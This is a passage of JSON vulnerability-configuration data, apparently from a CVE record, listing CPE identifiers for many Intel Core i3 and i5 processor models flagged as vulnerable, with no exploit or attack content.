[], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3240:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3240t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3245:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3250:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3250t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4000m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4005u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4010u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4010y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4012y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4020y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4025u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4030u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4030y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4100e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4100m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4100u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4102e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4110e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4110m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4112e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4120u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4130:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4130t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4150:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4150t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4158u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4160:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4160t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4170:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4170t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4330:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4330t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4330te:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4340:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4340te:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4350:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4350t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4360:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4360t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4370:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4370t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:5005u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:5010u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:5015u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:5020u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:5157u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6006u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6098p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100te:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6102e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6157u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6167u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6300:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6300t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6320:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:8100:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:8350k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:430m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:430um:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:450m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:460m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:470um:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:480m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:520e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:520m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:520um:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:540m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:540um:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:560m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:560um:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:580m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:650:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:655k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:660:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:661:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:670:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:680:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:750:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:750s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:760:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2300:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2310:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2320:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2380p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2390t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2400:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2400s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2405s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2410m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2430m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2435m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2450m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2450p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2467m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2500:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2500k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2500s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2500t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2510e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2515e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2520m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2537m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2540m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2550k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2557m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3210m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3230m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3317u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3320m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3330:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3330s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3337u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3339y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3340:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3340m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3340s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3350p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3360m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3380m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3427u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3437u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3439y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3450:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3450s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3470:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3470s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3470t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3475s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3550:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3550s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3570:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3570k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3570s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3570t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3610me:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4200h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4200m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4200u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4200y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4202y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4210h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4210m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4210u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4210y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4220y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4250u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4258u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4260u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4278u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4288u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4300m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4300u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4300y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4302y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4308u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4310m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4310u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4330m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4340m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4350u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4360u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4400e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4402e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4402ec:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4410e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4422e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4430:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4430s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4440:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4440s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4460:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4460s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4460t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570te:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4590:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4590s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4590t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4690:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4690k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4690s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4690t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:5200u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:5250u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:5257u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:5287u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:5300u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:5350h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:5350u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:5575r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:5675c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:5675r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6200u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6260u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6267u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6287u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6300hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6300u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6350hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6360u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6400:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6400t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6402p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6440eq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6440hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6442eq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6500:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6500t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6500te:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6585r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6600:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6600k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6600t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6685r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, 